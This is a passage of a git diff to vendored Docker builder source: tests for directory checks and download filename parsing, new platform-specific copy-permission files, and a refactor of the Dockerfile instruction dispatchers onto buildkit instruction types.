tmpfile.Remove() + tmpdir := fs.NewDir(t, "dir-exists-test") + defer tmpdir.Remove() + + var testcases = []struct { + doc string + path string + expected bool + }{ + { + doc: "directory exists", + path: tmpdir.Path(), + expected: true, + }, + { + doc: "path doesn't exist", + path: "/bogus/path/does/not/exist", + expected: false, + }, + { + doc: "file exists", + path: tmpfile.Path(), + expected: false, + }, + } + + for _, testcase := range testcases { + result, err := isExistingDirectory(©Endpoint{driver: containerfs.NewLocalDriver(), path: testcase.path}) + if !assert.Check(t, err) { + continue + } + assert.Check(t, is.Equal(testcase.expected, result), testcase.doc) + } +} + +func TestGetFilenameForDownload(t *testing.T) { + var testcases = []struct { + path string + disposition string + expected string + }{ + { + path: "http://www.example.com/", + expected: "", + }, + { + path: "http://www.example.com/xyz", + expected: "xyz", + }, + { + path: "http://www.example.com/xyz.html", + expected: "xyz.html", + }, + { + path: "http://www.example.com/xyz/", + expected: "", + }, + { + path: "http://www.example.com/xyz/uvw", + expected: "uvw", + }, + { + path: "http://www.example.com/xyz/uvw.html", + expected: "uvw.html", + }, + { + path: "http://www.example.com/xyz/uvw/", + expected: "", + }, + { + path: "/", + expected: "", + }, + { + path: "/xyz", + expected: "xyz", + }, + { + path: "/xyz.html", + expected: "xyz.html", + }, + { + path: "/xyz/", + expected: "", + }, + { + path: "/xyz/", + disposition: "attachment; filename=xyz.html", + expected: "xyz.html", + }, + { + disposition: "", + expected: "", + }, + { + disposition: "attachment; filename=xyz", + expected: "xyz", + }, + { + disposition: "attachment; filename=xyz.html", + expected: "xyz.html", + }, + { + disposition: "attachment; filename=\"xyz\"", + expected: "xyz", + }, + { + disposition: "attachment; filename=\"xyz.html\"", + expected: "xyz.html", + }, + { + disposition: "attachment; filename=\"/xyz.html\"", + 
expected: "xyz.html", + }, + { + disposition: "attachment; filename=\"/xyz/uvw\"", + expected: "uvw", + }, + { + disposition: "attachment; filename=\"Naïve file.txt\"", + expected: "Naïve file.txt", + }, + } + for _, testcase := range testcases { + resp := http.Response{ + Header: make(map[string][]string), + } + if testcase.disposition != "" { + resp.Header.Add("Content-Disposition", testcase.disposition) + } + filename := getFilenameForDownload(testcase.path, &resp) + assert.Check(t, is.Equal(testcase.expected, filename)) + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/copy_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/copy_unix.go new file mode 100644 index 0000000000..15453452e5 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/copy_unix.go @@ -0,0 +1,48 @@ +// +build !windows + +package dockerfile // import "github.com/docker/docker/builder/dockerfile" + +import ( + "os" + "path/filepath" + + "github.com/docker/docker/pkg/containerfs" + "github.com/docker/docker/pkg/idtools" +) + +func fixPermissions(source, destination string, rootIDs idtools.IDPair, overrideSkip bool) error { + var ( + skipChownRoot bool + err error + ) + if !overrideSkip { + destEndpoint := ©Endpoint{driver: containerfs.NewLocalDriver(), path: destination} + skipChownRoot, err = isExistingDirectory(destEndpoint) + if err != nil { + return err + } + } + + // We Walk on the source rather than on the destination because we don't + // want to change permissions on things we haven't created or modified. + return filepath.Walk(source, func(fullpath string, info os.FileInfo, err error) error { + // Do not alter the walk root iff. it existed before, as it doesn't fall under + // the domain of "things we should chown". + if skipChownRoot && source == fullpath { + return nil + } + + // Path is prefixed by source: substitute with destination instead. 
+ cleaned, err := filepath.Rel(source, fullpath) + if err != nil { + return err + } + + fullpath = filepath.Join(destination, cleaned) + return os.Lchown(fullpath, rootIDs.UID, rootIDs.GID) + }) +} + +func validateCopySourcePath(imageSource *imageMount, origPath, platform string) error { + return nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/copy_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/copy_windows.go new file mode 100644 index 0000000000..907c34407c --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/copy_windows.go @@ -0,0 +1,43 @@ +package dockerfile // import "github.com/docker/docker/builder/dockerfile" + +import ( + "errors" + "path/filepath" + "strings" + + "github.com/docker/docker/pkg/idtools" +) + +var pathBlacklist = map[string]bool{ + "c:\\": true, + "c:\\windows": true, +} + +func fixPermissions(source, destination string, rootIDs idtools.IDPair, overrideSkip bool) error { + // chown is not supported on Windows + return nil +} + +func validateCopySourcePath(imageSource *imageMount, origPath, platform string) error { + // validate windows paths from other images + LCOW + if imageSource == nil || platform != "windows" { + return nil + } + + origPath = filepath.FromSlash(origPath) + p := strings.ToLower(filepath.Clean(origPath)) + if !filepath.IsAbs(p) { + if filepath.VolumeName(p) != "" { + if p[len(p)-2:] == ":." { // case where clean returns weird c:. 
paths + p = p[:len(p)-1] + } + p += "\\" + } else { + p = filepath.Join("c:\\", p) + } + } + if _, blacklisted := pathBlacklist[p]; blacklisted { + return errors.New("copy from c:\\ or c:\\windows is not allowed on windows") + } + return nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers.go index 3e78abdd68..4d47c208b7 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers.go @@ -1,4 +1,4 @@ -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" // This file contains the dispatchers for each command. Note that // `nullDispatch` is not actually a command, but support for commands we parse @@ -8,23 +8,26 @@ package dockerfile // package. import ( + "bytes" "fmt" - "regexp" "runtime" "sort" - "strconv" "strings" - "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/api" - "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/container" "github.com/docker/docker/api/types/strslice" "github.com/docker/docker/builder" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/image" + "github.com/docker/docker/pkg/jsonmessage" "github.com/docker/docker/pkg/signal" - runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/docker/docker/pkg/system" "github.com/docker/go-connections/nat" + "github.com/moby/buildkit/frontend/dockerfile/instructions" + "github.com/moby/buildkit/frontend/dockerfile/parser" + "github.com/moby/buildkit/frontend/dockerfile/shell" + "github.com/pkg/errors" ) // ENV foo bar @@ -32,127 +35,54 @@ import ( // Sets the environment variable foo to bar, also makes interpolation // in the dockerfile available from the next statement on via ${foo}. 
// -func env(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) == 0 { - return errAtLeastOneArgument("ENV") - } - - if len(args)%2 != 0 { - // should never get here, but just in case - return errTooManyArguments("ENV") - } - - if err := b.flags.Parse(); err != nil { - return err - } - - // TODO/FIXME/NOT USED - // Just here to show how to use the builder flags stuff within the - // context of a builder command. Will remove once we actually add - // a builder command to something! - /* - flBool1 := b.flags.AddBool("bool1", false) - flStr1 := b.flags.AddString("str1", "HI") - - if err := b.flags.Parse(); err != nil { - return err - } - - fmt.Printf("Bool1:%v\n", flBool1) - fmt.Printf("Str1:%v\n", flStr1) - */ - - commitStr := "ENV" - - for j := 0; j < len(args); j++ { - // name ==> args[j] - // value ==> args[j+1] - - if len(args[j]) == 0 { - return errBlankCommandNames("ENV") - } - newVar := args[j] + "=" + args[j+1] + "" - commitStr += " " + newVar +func dispatchEnv(d dispatchRequest, c *instructions.EnvCommand) error { + runConfig := d.state.runConfig + commitMessage := bytes.NewBufferString("ENV") + for _, e := range c.Env { + name := e.Key + newVar := e.String() + commitMessage.WriteString(" " + newVar) gotOne := false - for i, envVar := range b.runConfig.Env { + for i, envVar := range runConfig.Env { envParts := strings.SplitN(envVar, "=", 2) compareFrom := envParts[0] - compareTo := args[j] - if runtime.GOOS == "windows" { - // Case insensitive environment variables on Windows - compareFrom = strings.ToUpper(compareFrom) - compareTo = strings.ToUpper(compareTo) - } - if compareFrom == compareTo { - b.runConfig.Env[i] = newVar + if shell.EqualEnvKeys(compareFrom, name) { + runConfig.Env[i] = newVar gotOne = true break } } if !gotOne { - b.runConfig.Env = append(b.runConfig.Env, newVar) + runConfig.Env = append(runConfig.Env, newVar) } - j++ } - - return b.commit("", b.runConfig.Cmd, commitStr) + return 
d.builder.commit(d.state, commitMessage.String()) } // MAINTAINER some text // // Sets the maintainer metadata. -func maintainer(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) != 1 { - return errExactlyOneArgument("MAINTAINER") - } +func dispatchMaintainer(d dispatchRequest, c *instructions.MaintainerCommand) error { - if err := b.flags.Parse(); err != nil { - return err - } - - b.maintainer = args[0] - return b.commit("", b.runConfig.Cmd, fmt.Sprintf("MAINTAINER %s", b.maintainer)) + d.state.maintainer = c.Maintainer + return d.builder.commit(d.state, "MAINTAINER "+c.Maintainer) } // LABEL some json data describing the image // // Sets the Label variable foo to bar, // -func label(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) == 0 { - return errAtLeastOneArgument("LABEL") - } - if len(args)%2 != 0 { - // should never get here, but just in case - return errTooManyArguments("LABEL") +func dispatchLabel(d dispatchRequest, c *instructions.LabelCommand) error { + if d.state.runConfig.Labels == nil { + d.state.runConfig.Labels = make(map[string]string) } - - if err := b.flags.Parse(); err != nil { - return err - } - commitStr := "LABEL" - - if b.runConfig.Labels == nil { - b.runConfig.Labels = map[string]string{} + for _, v := range c.Labels { + d.state.runConfig.Labels[v.Key] = v.Value + commitStr += " " + v.String() } - - for j := 0; j < len(args); j++ { - // name ==> args[j] - // value ==> args[j+1] - - if len(args[j]) == 0 { - return errBlankCommandNames("LABEL") - } - - newVar := args[j] + "=" + args[j+1] + "" - commitStr += " " + newVar - - b.runConfig.Labels[args[j]] = args[j+1] - j++ - } - return b.commit("", b.runConfig.Cmd, commitStr) + return d.builder.commit(d.state, commitStr) } // ADD foo /path @@ -160,128 +90,204 @@ func label(b *Builder, args []string, attributes map[string]bool, original strin // Add the file 'foo' to '/path'. 
Tarball and Remote URL (git, http) handling // exist here. If you do not wish to have this automatic handling, use COPY. // -func add(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) < 2 { - return errAtLeastTwoArguments("ADD") - } +func dispatchAdd(d dispatchRequest, c *instructions.AddCommand) error { + downloader := newRemoteSourceDownloader(d.builder.Output, d.builder.Stdout) + copier := copierFromDispatchRequest(d, downloader, nil) + defer copier.Cleanup() - if err := b.flags.Parse(); err != nil { + copyInstruction, err := copier.createCopyInstruction(c.SourcesAndDest, "ADD") + if err != nil { return err } + copyInstruction.chownStr = c.Chown + copyInstruction.allowLocalDecompression = true - return b.runContextCommand(args, true, true, "ADD") + return d.builder.performCopy(d.state, copyInstruction) } // COPY foo /path // // Same as 'ADD' but without the tar and remote url handling. // -func dispatchCopy(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) < 2 { - return errAtLeastTwoArguments("COPY") +func dispatchCopy(d dispatchRequest, c *instructions.CopyCommand) error { + var im *imageMount + var err error + if c.From != "" { + im, err = d.getImageMount(c.From) + if err != nil { + return errors.Wrapf(err, "invalid from flag value %s", c.From) + } } - - if err := b.flags.Parse(); err != nil { + copier := copierFromDispatchRequest(d, errOnSourceDownload, im) + defer copier.Cleanup() + copyInstruction, err := copier.createCopyInstruction(c.SourcesAndDest, "COPY") + if err != nil { return err } + copyInstruction.chownStr = c.Chown - return b.runContextCommand(args, false, false, "COPY") + return d.builder.performCopy(d.state, copyInstruction) } -// FROM imagename -// -// This sets the image the dockerfile will build on top of. 
-// -func from(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) != 1 { - return errExactlyOneArgument("FROM") +func (d *dispatchRequest) getImageMount(imageRefOrID string) (*imageMount, error) { + if imageRefOrID == "" { + // TODO: this could return the source in the default case as well? + return nil, nil } - if err := b.flags.Parse(); err != nil { - return err + var localOnly bool + stage, err := d.stages.get(imageRefOrID) + if err != nil { + return nil, err } + if stage != nil { + imageRefOrID = stage.Image + localOnly = true + } + return d.builder.imageSources.Get(imageRefOrID, localOnly, d.state.operatingSystem) +} - name := args[0] - - var ( - image builder.Image - err error - ) +// FROM [--platform=platform] imagename[:tag | @digest] [AS build-stage-name] +// +func initializeStage(d dispatchRequest, cmd *instructions.Stage) error { + d.builder.imageProber.Reset() + if err := system.ValidatePlatform(&cmd.Platform); err != nil { + return err + } + image, err := d.getFromImage(d.shlex, cmd.BaseName, cmd.Platform.OS) + if err != nil { + return err + } + state := d.state + if err := state.beginStage(cmd.Name, image); err != nil { + return err + } + if len(state.runConfig.OnBuild) > 0 { + triggers := state.runConfig.OnBuild + state.runConfig.OnBuild = nil + return dispatchTriggeredOnBuild(d, triggers) + } + return nil +} - // Windows cannot support a container with no base image. 
- if name == api.NoBaseImageSpecifier { - if runtime.GOOS == "windows" { - return fmt.Errorf("Windows does not support FROM scratch") +func dispatchTriggeredOnBuild(d dispatchRequest, triggers []string) error { + fmt.Fprintf(d.builder.Stdout, "# Executing %d build trigger", len(triggers)) + if len(triggers) > 1 { + fmt.Fprint(d.builder.Stdout, "s") + } + fmt.Fprintln(d.builder.Stdout) + for _, trigger := range triggers { + d.state.updateRunConfig() + ast, err := parser.Parse(strings.NewReader(trigger)) + if err != nil { + return err } - b.image = "" - b.noBaseImage = true - } else { - // TODO: don't use `name`, instead resolve it to a digest - if !b.options.PullParent { - image, err = b.docker.GetImageOnBuild(name) - // TODO: shouldn't we error out if error is different from "not found" ? + if len(ast.AST.Children) != 1 { + return errors.New("onbuild trigger should be a single expression") } - if image == nil { - image, err = b.docker.PullOnBuild(b.clientCtx, name, b.options.AuthConfigs, b.Output) - if err != nil { - return err + cmd, err := instructions.ParseCommand(ast.AST.Children[0]) + if err != nil { + if instructions.IsUnknownInstruction(err) { + buildsFailed.WithValues(metricsUnknownInstructionError).Inc() } + return err } + err = dispatch(d, cmd) + if err != nil { + return err + } + } + return nil +} + +func (d *dispatchRequest) getExpandedImageName(shlex *shell.Lex, name string) (string, error) { + substitutionArgs := []string{} + for key, value := range d.state.buildArgs.GetAllMeta() { + substitutionArgs = append(substitutionArgs, key+"="+value) } - b.from = image - return b.processImageFrom(image) + name, err := shlex.ProcessWord(name, substitutionArgs) + if err != nil { + return "", err + } + return name, nil } -// ONBUILD RUN echo yo -// -// ONBUILD triggers run when the image is used in a FROM statement. 
-// -// ONBUILD handling has a lot of special-case functionality, the heading in -// evaluator.go and comments around dispatch() in the same file explain the -// special cases. search for 'OnBuild' in internals.go for additional special -// cases. -// -func onbuild(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) == 0 { - return errAtLeastOneArgument("ONBUILD") +// getOsFromFlagsAndStage calculates the operating system if we need to pull an image. +// stagePlatform contains the value supplied by optional `--platform=` on +// a current FROM statement. b.builder.options.Platform contains the operating +// system part of the optional flag passed in the API call (or CLI flag +// through `docker build --platform=...`). Precedence is for an explicit +// platform indication in the FROM statement. +func (d *dispatchRequest) getOsFromFlagsAndStage(stageOS string) string { + switch { + case stageOS != "": + return stageOS + case d.builder.options.Platform != "": + // Note this is API "platform", but by this point, as the daemon is not + // multi-arch aware yet, it is guaranteed to only hold the OS part here. + return d.builder.options.Platform + default: + return runtime.GOOS } +} - if err := b.flags.Parse(); err != nil { - return err +func (d *dispatchRequest) getImageOrStage(name string, stageOS string) (builder.Image, error) { + var localOnly bool + if im, ok := d.stages.getByName(name); ok { + name = im.Image + localOnly = true } - triggerInstruction := strings.ToUpper(strings.TrimSpace(args[0])) - switch triggerInstruction { - case "ONBUILD": - return fmt.Errorf("Chaining ONBUILD via `ONBUILD ONBUILD` isn't allowed") - case "MAINTAINER", "FROM": - return fmt.Errorf("%s isn't allowed as an ONBUILD trigger", triggerInstruction) + os := d.getOsFromFlagsAndStage(stageOS) + + // Windows cannot support a container with no base image unless it is LCOW. 
+ if name == api.NoBaseImageSpecifier { + imageImage := &image.Image{} + imageImage.OS = runtime.GOOS + if runtime.GOOS == "windows" { + switch os { + case "windows", "": + return nil, errors.New("Windows does not support FROM scratch") + case "linux": + if !system.LCOWSupported() { + return nil, errors.New("Linux containers are not supported on this system") + } + imageImage.OS = "linux" + default: + return nil, errors.Errorf("operating system %q is not supported", os) + } + } + return builder.Image(imageImage), nil } + imageMount, err := d.builder.imageSources.Get(name, localOnly, os) + if err != nil { + return nil, err + } + return imageMount.Image(), nil +} +func (d *dispatchRequest) getFromImage(shlex *shell.Lex, name string, stageOS string) (builder.Image, error) { + name, err := d.getExpandedImageName(shlex, name) + if err != nil { + return nil, err + } + return d.getImageOrStage(name, stageOS) +} - original = regexp.MustCompile(`(?i)^\s*ONBUILD\s*`).ReplaceAllString(original, "") +func dispatchOnbuild(d dispatchRequest, c *instructions.OnbuildCommand) error { - b.runConfig.OnBuild = append(b.runConfig.OnBuild, original) - return b.commit("", b.runConfig.Cmd, fmt.Sprintf("ONBUILD %s", original)) + d.state.runConfig.OnBuild = append(d.state.runConfig.OnBuild, c.Expression) + return d.builder.commit(d.state, "ONBUILD "+c.Expression) } // WORKDIR /tmp // // Set the working directory for future RUN/CMD/etc statements. // -func workdir(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) != 1 { - return errExactlyOneArgument("WORKDIR") - } - - err := b.flags.Parse() - if err != nil { - return err - } - - // This is from the Dockerfile and will not necessarily be in platform - // specific semantics, hence ensure it is converted. 
- b.runConfig.WorkingDir, err = normaliseWorkdir(b.runConfig.WorkingDir, args[0]) +func dispatchWorkdir(d dispatchRequest, c *instructions.WorkdirCommand) error { + runConfig := d.state.runConfig + var err error + runConfig.WorkingDir, err = normalizeWorkdir(d.state.operatingSystem, runConfig.WorkingDir, c.Path) if err != nil { return err } @@ -290,35 +296,33 @@ func workdir(b *Builder, args []string, attributes map[string]bool, original str // This avoids having an unnecessary expensive mount/unmount calls // (on Windows in particular) during each container create. // Prior to 1.13, the mkdir was deferred and not executed at this step. - if b.disableCommit { + if d.builder.disableCommit { // Don't call back into the daemon if we're going through docker commit --change "WORKDIR /foo". // We've already updated the runConfig and that's enough. return nil } - b.runConfig.Image = b.image - cmd := b.runConfig.Cmd - comment := "WORKDIR " + b.runConfig.WorkingDir - // reset the command for cache detection - b.runConfig.Cmd = strslice.StrSlice(append(getShell(b.runConfig), "#(nop) "+comment)) - defer func(cmd strslice.StrSlice) { b.runConfig.Cmd = cmd }(cmd) + comment := "WORKDIR " + runConfig.WorkingDir + runConfigWithCommentCmd := copyRunConfig(runConfig, withCmdCommentString(comment, d.state.operatingSystem)) - if hit, err := b.probeCache(); err != nil { + containerID, err := d.builder.probeAndCreate(d.state, runConfigWithCommentCmd) + if err != nil || containerID == "" { return err - } else if hit { - return nil } - container, err := b.docker.ContainerCreate(types.ContainerCreateConfig{Config: b.runConfig}) - if err != nil { - return err - } - b.tmpContainers[container.ID] = struct{}{} - if err := b.docker.ContainerCreateWorkdir(container.ID); err != nil { + if err := d.builder.docker.ContainerCreateWorkdir(containerID); err != nil { return err } - return b.commit(container.ID, cmd, comment) + return d.builder.commitContainer(d.state, containerID, 
runConfigWithCommentCmd) +} + +func resolveCmdLine(cmd instructions.ShellDependantCmdLine, runConfig *container.Config, os string) []string { + result := cmd.CmdLine + if cmd.PrependShell && result != nil { + result = append(getShell(runConfig, os), result...) + } + return result } // RUN some command yo @@ -327,117 +331,86 @@ func workdir(b *Builder, args []string, attributes map[string]bool, original str // the current SHELL which defaults to 'sh -c' under linux or 'cmd /S /C' under // Windows, in the event there is only one argument The difference in processing: // -// RUN echo hi # sh -c echo hi (Linux) +// RUN echo hi # sh -c echo hi (Linux and LCOW) // RUN echo hi # cmd /S /C echo hi (Windows) // RUN [ "echo", "hi" ] # echo hi // -func run(b *Builder, args []string, attributes map[string]bool, original string) error { - if b.image == "" && !b.noBaseImage { - return fmt.Errorf("Please provide a source image with `from` prior to run") - } - - if err := b.flags.Parse(); err != nil { - return err +func dispatchRun(d dispatchRequest, c *instructions.RunCommand) error { + if !system.IsOSSupported(d.state.operatingSystem) { + return system.ErrNotSupportedOperatingSystem } + stateRunConfig := d.state.runConfig + cmdFromArgs := resolveCmdLine(c.ShellDependantCmdLine, stateRunConfig, d.state.operatingSystem) + buildArgs := d.state.buildArgs.FilterAllowed(stateRunConfig.Env) - args = handleJSONArgs(args, attributes) - - if !attributes["json"] { - args = append(getShell(b.runConfig), args...) - } - config := &container.Config{ - Cmd: strslice.StrSlice(args), - Image: b.image, - } - - // stash the cmd - cmd := b.runConfig.Cmd - if len(b.runConfig.Entrypoint) == 0 && len(b.runConfig.Cmd) == 0 { - b.runConfig.Cmd = config.Cmd - } - - // stash the config environment - env := b.runConfig.Env - - defer func(cmd strslice.StrSlice) { b.runConfig.Cmd = cmd }(cmd) - defer func(env []string) { b.runConfig.Env = env }(env) - - // derive the net build-time environment for this run. 
We let config - // environment override the build time environment. - // This means that we take the b.buildArgs list of env vars and remove - // any of those variables that are defined as part of the container. In other - // words, anything in b.Config.Env. What's left is the list of build-time env - // vars that we need to add to each RUN command - note the list could be empty. - // - // We don't persist the build time environment with container's config - // environment, but just sort and prepend it to the command string at time - // of commit. - // This helps with tracing back the image's actual environment at the time - // of RUN, without leaking it to the final image. It also aids cache - // lookup for same image built with same build time environment. - cmdBuildEnv := []string{} - configEnv := runconfigopts.ConvertKVStringsToMap(b.runConfig.Env) - for key, val := range b.options.BuildArgs { - if !b.isBuildArgAllowed(key) { - // skip build-args that are not in allowed list, meaning they have - // not been defined by an "ARG" Dockerfile command yet. - // This is an error condition but only if there is no "ARG" in the entire - // Dockerfile, so we'll generate any necessary errors after we parsed - // the entire file (see 'leftoverArgs' processing in evaluator.go ) - continue - } - if _, ok := configEnv[key]; !ok && val != nil { - cmdBuildEnv = append(cmdBuildEnv, fmt.Sprintf("%s=%s", key, *val)) - } + saveCmd := cmdFromArgs + if len(buildArgs) > 0 { + saveCmd = prependEnvOnCmd(d.state.buildArgs, buildArgs, cmdFromArgs) } - // derive the command to use for probeCache() and to commit in this container. - // Note that we only do this if there are any build-time env vars. Also, we - // use the special argument "|#" at the start of the args array. This will - // avoid conflicts with any RUN command since commands can not - // start with | (vertical bar). The "#" (number of build envs) is there to - // help ensure proper cache matches. 
We don't want a RUN command - // that starts with "foo=abc" to be considered part of a build-time env var. - saveCmd := config.Cmd - if len(cmdBuildEnv) > 0 { - sort.Strings(cmdBuildEnv) - tmpEnv := append([]string{fmt.Sprintf("|%d", len(cmdBuildEnv))}, cmdBuildEnv...) - saveCmd = strslice.StrSlice(append(tmpEnv, saveCmd...)) - } - - b.runConfig.Cmd = saveCmd - hit, err := b.probeCache() - if err != nil { + runConfigForCacheProbe := copyRunConfig(stateRunConfig, + withCmd(saveCmd), + withEntrypointOverride(saveCmd, nil)) + if hit, err := d.builder.probeCache(d.state, runConfigForCacheProbe); err != nil || hit { return err } - if hit { - return nil - } - // set Cmd manually, this is special case only for Dockerfiles - b.runConfig.Cmd = config.Cmd - // set build-time environment for 'run'. - b.runConfig.Env = append(b.runConfig.Env, cmdBuildEnv...) - // set config as already being escaped, this prevents double escaping on windows - b.runConfig.ArgsEscaped = true + runConfig := copyRunConfig(stateRunConfig, + withCmd(cmdFromArgs), + withEnv(append(stateRunConfig.Env, buildArgs...)), + withEntrypointOverride(saveCmd, strslice.StrSlice{""})) - logrus.Debugf("[BUILDER] Command to be executed: %v", b.runConfig.Cmd) + // set config as already being escaped, this prevents double escaping on windows + runConfig.ArgsEscaped = true - cID, err := b.create() + cID, err := d.builder.create(runConfig) if err != nil { return err } - if err := b.run(cID); err != nil { + if err := d.builder.containerManager.Run(d.builder.clientCtx, cID, d.builder.Stdout, d.builder.Stderr); err != nil { + if err, ok := err.(*statusCodeError); ok { + // TODO: change error type, because jsonmessage.JSONError assumes HTTP + msg := fmt.Sprintf( + "The command '%s' returned a non-zero code: %d", + strings.Join(runConfig.Cmd, " "), err.StatusCode()) + if err.Error() != "" { + msg = fmt.Sprintf("%s: %s", msg, err.Error()) + } + return &jsonmessage.JSONError{ + Message: msg, + Code: err.StatusCode(), + } + } 
return err } - // revert to original config environment and set the command string to - // have the build-time env vars in it (if any) so that future cache look-ups - // properly match it. - b.runConfig.Env = env - b.runConfig.Cmd = saveCmd - return b.commit(cID, cmd, "run") + return d.builder.commitContainer(d.state, cID, runConfigForCacheProbe) +} + +// Derive the command to use for probeCache() and to commit in this container. +// Note that we only do this if there are any build-time env vars. Also, we +// use the special argument "|#" at the start of the args array. This will +// avoid conflicts with any RUN command since commands can not +// start with | (vertical bar). The "#" (number of build envs) is there to +// help ensure proper cache matches. We don't want a RUN command +// that starts with "foo=abc" to be considered part of a build-time env var. +// +// remove any unreferenced built-in args from the environment variables. +// These args are transparent so resulting image should be the same regardless +// of the value. +func prependEnvOnCmd(buildArgs *BuildArgs, buildArgVars []string, cmd strslice.StrSlice) strslice.StrSlice { + var tmpBuildEnv []string + for _, env := range buildArgVars { + key := strings.SplitN(env, "=", 2)[0] + if buildArgs.IsReferencedOrNotBuiltin(key) { + tmpBuildEnv = append(tmpBuildEnv, env) + } + } + + sort.Strings(tmpBuildEnv) + tmpEnv := append([]string{fmt.Sprintf("|%d", len(tmpBuildEnv))}, tmpBuildEnv...) + return strslice.StrSlice(append(tmpEnv, cmd...)) } // CMD foo @@ -445,131 +418,39 @@ func run(b *Builder, args []string, attributes map[string]bool, original string) // Set the default command to run in the container (which may be empty). // Argument handling is the same as RUN. 
// -func cmd(b *Builder, args []string, attributes map[string]bool, original string) error { - if err := b.flags.Parse(); err != nil { - return err - } - - cmdSlice := handleJSONArgs(args, attributes) - - if !attributes["json"] { - cmdSlice = append(getShell(b.runConfig), cmdSlice...) - } - - b.runConfig.Cmd = strslice.StrSlice(cmdSlice) +func dispatchCmd(d dispatchRequest, c *instructions.CmdCommand) error { + runConfig := d.state.runConfig + cmd := resolveCmdLine(c.ShellDependantCmdLine, runConfig, d.state.operatingSystem) + runConfig.Cmd = cmd // set config as already being escaped, this prevents double escaping on windows - b.runConfig.ArgsEscaped = true + runConfig.ArgsEscaped = true - if err := b.commit("", b.runConfig.Cmd, fmt.Sprintf("CMD %q", cmdSlice)); err != nil { + if err := d.builder.commit(d.state, fmt.Sprintf("CMD %q", cmd)); err != nil { return err } - if len(args) != 0 { - b.cmdSet = true + if len(c.ShellDependantCmdLine.CmdLine) != 0 { + d.state.cmdSet = true } return nil } -// parseOptInterval(flag) is the duration of flag.Value, or 0 if -// empty. An error is reported if the value is given and is not positive. -func parseOptInterval(f *Flag) (time.Duration, error) { - s := f.Value - if s == "" { - return 0, nil - } - d, err := time.ParseDuration(s) - if err != nil { - return 0, err - } - if d <= 0 { - return 0, fmt.Errorf("Interval %#v must be positive", f.name) - } - return d, nil -} - // HEALTHCHECK foo // // Set the default healthcheck command to run in the container (which may be empty). // Argument handling is the same as RUN. 
// -func healthcheck(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) == 0 { - return errAtLeastOneArgument("HEALTHCHECK") - } - typ := strings.ToUpper(args[0]) - args = args[1:] - if typ == "NONE" { - if len(args) != 0 { - return fmt.Errorf("HEALTHCHECK NONE takes no arguments") - } - test := strslice.StrSlice{typ} - b.runConfig.Healthcheck = &container.HealthConfig{ - Test: test, - } - } else { - if b.runConfig.Healthcheck != nil { - oldCmd := b.runConfig.Healthcheck.Test - if len(oldCmd) > 0 && oldCmd[0] != "NONE" { - fmt.Fprintf(b.Stdout, "Note: overriding previous HEALTHCHECK: %v\n", oldCmd) - } - } - - healthcheck := container.HealthConfig{} - - flInterval := b.flags.AddString("interval", "") - flTimeout := b.flags.AddString("timeout", "") - flRetries := b.flags.AddString("retries", "") - - if err := b.flags.Parse(); err != nil { - return err - } - - switch typ { - case "CMD": - cmdSlice := handleJSONArgs(args, attributes) - if len(cmdSlice) == 0 { - return fmt.Errorf("Missing command after HEALTHCHECK CMD") - } - - if !attributes["json"] { - typ = "CMD-SHELL" - } - - healthcheck.Test = strslice.StrSlice(append([]string{typ}, cmdSlice...)) - default: - return fmt.Errorf("Unknown type %#v in HEALTHCHECK (try CMD)", typ) - } - - interval, err := parseOptInterval(flInterval) - if err != nil { - return err +func dispatchHealthcheck(d dispatchRequest, c *instructions.HealthCheckCommand) error { + runConfig := d.state.runConfig + if runConfig.Healthcheck != nil { + oldCmd := runConfig.Healthcheck.Test + if len(oldCmd) > 0 && oldCmd[0] != "NONE" { + fmt.Fprintf(d.builder.Stdout, "Note: overriding previous HEALTHCHECK: %v\n", oldCmd) } - healthcheck.Interval = interval - - timeout, err := parseOptInterval(flTimeout) - if err != nil { - return err - } - healthcheck.Timeout = timeout - - if flRetries.Value != "" { - retries, err := strconv.ParseInt(flRetries.Value, 10, 32) - if err != nil { - return err - } - if retries < 1 
{ - return fmt.Errorf("--retries must be at least 1 (not %d)", retries) - } - healthcheck.Retries = int(retries) - } else { - healthcheck.Retries = 0 - } - - b.runConfig.Healthcheck = &healthcheck } - - return b.commit("", b.runConfig.Cmd, fmt.Sprintf("HEALTHCHECK %q", b.runConfig.Healthcheck)) + runConfig.Healthcheck = c.Health + return d.builder.commit(d.state, fmt.Sprintf("HEALTHCHECK %q", runConfig.Healthcheck)) } // ENTRYPOINT /usr/sbin/nginx @@ -577,80 +458,52 @@ func healthcheck(b *Builder, args []string, attributes map[string]bool, original // Set the entrypoint to /usr/sbin/nginx. Will accept the CMD as the arguments // to /usr/sbin/nginx. Uses the default shell if not in JSON format. // -// Handles command processing similar to CMD and RUN, only b.runConfig.Entrypoint -// is initialized at NewBuilder time instead of through argument parsing. +// Handles command processing similar to CMD and RUN, only req.runConfig.Entrypoint +// is initialized at newBuilder time instead of through argument parsing. 
